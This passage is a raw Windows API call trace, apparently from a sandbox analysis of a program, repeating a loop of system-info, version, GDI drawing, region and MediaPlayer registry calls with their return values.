dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.620] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.620] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.620] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.620] BeginPath (hdc=0x0) returned 0 [0087.620] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.620] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.620] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.620] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.620] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.620] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.620] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.620] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.620] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x400401cd [0087.620] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3e0401d0 [0087.620] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104089d [0087.620] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104089e [0087.620] CombineRgn (hrgnDst=0x104089d, hrgnSrc1=0x400401cd, hrgnSrc2=0x3e0401d0, iMode=1) returned 1 [0087.620] CombineRgn (hrgnDst=0x104089e, hrgnSrc1=0x400401cd, hrgnSrc2=0x3e0401d0, iMode=4) returned 2 [0087.620] CreateSolidBrush (color=0xff) returned 0x210089c [0087.620] CreateSolidBrush (color=0xff0000) returned 0x110089f [0087.621] DeleteObject (ho=0x110089f) returned 1 [0087.621] DeleteObject (ho=0x3e0401d0) returned 1 [0087.621] DeleteObject (ho=0x400401cd) returned 1 [0087.621] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.621] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.621] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.621] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.621] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.621] BeginPath (hdc=0x0) returned 0 [0087.621] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.621] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.621] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.621] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.621] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.621] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.621] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.621] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.621] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3f0401d0 [0087.621] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x410401cd [0087.621] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408a0 [0087.621] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408a1 [0087.621] CombineRgn (hrgnDst=0x10408a0, hrgnSrc1=0x3f0401d0, hrgnSrc2=0x410401cd, iMode=1) returned 1 [0087.621] CombineRgn (hrgnDst=0x10408a1, hrgnSrc1=0x3f0401d0, hrgnSrc2=0x410401cd, iMode=4) returned 2 [0087.621] CreateSolidBrush (color=0xff) returned 0x210089f [0087.621] CreateSolidBrush (color=0xff0000) returned 0x11008a2 [0087.621] DeleteObject (ho=0x11008a2) returned 1 [0087.621] DeleteObject (ho=0x410401cd) returned 1 [0087.621] DeleteObject (ho=0x3f0401d0) returned 1 [0087.621] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.621] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.621] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.621] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.621] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.621] BeginPath (hdc=0x0) returned 0 [0087.621] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.621] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.621] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.621] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.621] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.621] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.621] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.622] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.622] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x420401cd [0087.622] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x400401d0 [0087.622] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408a3 [0087.622] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408a4 [0087.622] CombineRgn (hrgnDst=0x10408a3, hrgnSrc1=0x420401cd, hrgnSrc2=0x400401d0, iMode=1) returned 1 [0087.622] CombineRgn (hrgnDst=0x10408a4, hrgnSrc1=0x420401cd, hrgnSrc2=0x400401d0, iMode=4) returned 2 [0087.622] CreateSolidBrush (color=0xff) returned 0x21008a2 [0087.622] CreateSolidBrush (color=0xff0000) returned 0x11008a5 [0087.622] DeleteObject (ho=0x11008a5) returned 1 [0087.622] DeleteObject (ho=0x400401d0) returned 1 [0087.622] DeleteObject (ho=0x420401cd) returned 1 [0087.622] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.622] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.622] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.622] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.622] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.622] BeginPath (hdc=0x0) returned 0 [0087.622] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.622] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.622] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.622] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.622] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.622] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.622] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.622] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.623] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x410401d0 [0087.623] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x430401cd [0087.623] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408a6 [0087.623] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408a7 [0087.623] CombineRgn (hrgnDst=0x10408a6, hrgnSrc1=0x410401d0, hrgnSrc2=0x430401cd, iMode=1) returned 1 [0087.623] CombineRgn (hrgnDst=0x10408a7, hrgnSrc1=0x410401d0, hrgnSrc2=0x430401cd, iMode=4) returned 2 [0087.623] CreateSolidBrush (color=0xff) returned 0x21008a5 [0087.623] CreateSolidBrush (color=0xff0000) returned 0x11008a8 [0087.623] DeleteObject (ho=0x11008a8) returned 1 [0087.623] DeleteObject (ho=0x430401cd) returned 1 [0087.623] DeleteObject (ho=0x410401d0) returned 1 [0087.623] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.623] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.623] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.623] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.623] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.623] BeginPath (hdc=0x0) returned 0 [0087.623] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.623] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.623] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.623] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.623] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.623] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.623] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.623] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.623] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x440401cd [0087.623] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x420401d0 [0087.623] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408a9 [0087.623] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408aa [0087.623] CombineRgn (hrgnDst=0x10408a9, hrgnSrc1=0x440401cd, hrgnSrc2=0x420401d0, iMode=1) returned 1 [0087.623] CombineRgn (hrgnDst=0x10408aa, hrgnSrc1=0x440401cd, hrgnSrc2=0x420401d0, iMode=4) returned 2 [0087.623] CreateSolidBrush (color=0xff) returned 0x21008a8 [0087.623] CreateSolidBrush (color=0xff0000) returned 0x11008ab [0087.623] DeleteObject (ho=0x11008ab) returned 1 [0087.623] DeleteObject (ho=0x420401d0) returned 1 [0087.623] DeleteObject (ho=0x440401cd) returned 1 [0087.623] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.623] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.624] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.624] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.624] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.624] BeginPath (hdc=0x0) returned 0 [0087.624] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.624] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.624] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.624] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.624] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.624] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.624] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.624] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.624] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x430401d0 [0087.624] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x450401cd [0087.624] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408ac [0087.624] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408ad [0087.624] CombineRgn (hrgnDst=0x10408ac, hrgnSrc1=0x430401d0, hrgnSrc2=0x450401cd, iMode=1) returned 1 [0087.624] CombineRgn (hrgnDst=0x10408ad, hrgnSrc1=0x430401d0, hrgnSrc2=0x450401cd, iMode=4) returned 2 [0087.624] CreateSolidBrush (color=0xff) returned 0x21008ab [0087.624] CreateSolidBrush (color=0xff0000) returned 0x11008ae [0087.624] DeleteObject (ho=0x11008ae) returned 1 [0087.624] DeleteObject (ho=0x450401cd) returned 1 [0087.624] DeleteObject (ho=0x430401d0) returned 1 [0087.624] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.624] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.624] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.624] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.624] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.624] BeginPath (hdc=0x0) returned 0 [0087.624] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.624] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.624] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.624] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.624] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.624] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.624] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.624] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.625] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x460401cd [0087.625] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x440401d0 [0087.625] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408af [0087.625] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408b0 [0087.625] CombineRgn (hrgnDst=0x10408af, hrgnSrc1=0x460401cd, hrgnSrc2=0x440401d0, iMode=1) returned 1 [0087.625] CombineRgn (hrgnDst=0x10408b0, hrgnSrc1=0x460401cd, hrgnSrc2=0x440401d0, iMode=4) returned 2 [0087.625] CreateSolidBrush (color=0xff) returned 0x21008ae [0087.625] CreateSolidBrush (color=0xff0000) returned 0x11008b1 [0087.625] DeleteObject (ho=0x11008b1) returned 1 [0087.625] DeleteObject (ho=0x440401d0) returned 1 [0087.625] DeleteObject (ho=0x460401cd) returned 1 [0087.625] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.625] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.625] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.625] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.625] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.625] BeginPath (hdc=0x0) returned 0 [0087.625] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.625] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.625] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.625] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.625] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.625] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.625] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.625] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.625] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x450401d0 [0087.625] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x470401cd [0087.625] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408b2 [0087.625] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408b3 [0087.625] CombineRgn (hrgnDst=0x10408b2, hrgnSrc1=0x450401d0, hrgnSrc2=0x470401cd, iMode=1) returned 1 [0087.625] CombineRgn (hrgnDst=0x10408b3, hrgnSrc1=0x450401d0, hrgnSrc2=0x470401cd, iMode=4) returned 2 [0087.625] CreateSolidBrush (color=0xff) returned 0x21008b1 [0087.625] CreateSolidBrush (color=0xff0000) returned 0x11008b4 [0087.625] DeleteObject (ho=0x11008b4) returned 1 [0087.625] DeleteObject (ho=0x470401cd) returned 1 [0087.625] DeleteObject (ho=0x450401d0) returned 1 [0087.625] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.625] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.625] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.625] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.625] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.626] BeginPath (hdc=0x0) returned 0 [0087.626] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.626] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.626] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.626] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.626] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.626] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.626] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.626] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.626] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x480401cd [0087.626] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x460401d0 [0087.626] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408b5 [0087.626] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408b6 [0087.626] CombineRgn (hrgnDst=0x10408b5, hrgnSrc1=0x480401cd, hrgnSrc2=0x460401d0, iMode=1) returned 1 [0087.626] CombineRgn (hrgnDst=0x10408b6, hrgnSrc1=0x480401cd, hrgnSrc2=0x460401d0, iMode=4) returned 2 [0087.626] CreateSolidBrush (color=0xff) returned 0x21008b4 [0087.626] CreateSolidBrush (color=0xff0000) returned 0x11008b7 [0087.626] DeleteObject (ho=0x11008b7) returned 1 [0087.626] DeleteObject (ho=0x460401d0) returned 1 [0087.626] DeleteObject (ho=0x480401cd) returned 1 [0087.626] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.626] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.626] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.626] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.626] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.626] BeginPath (hdc=0x0) returned 0 [0087.626] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.626] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.626] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.626] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.626] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.626] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: 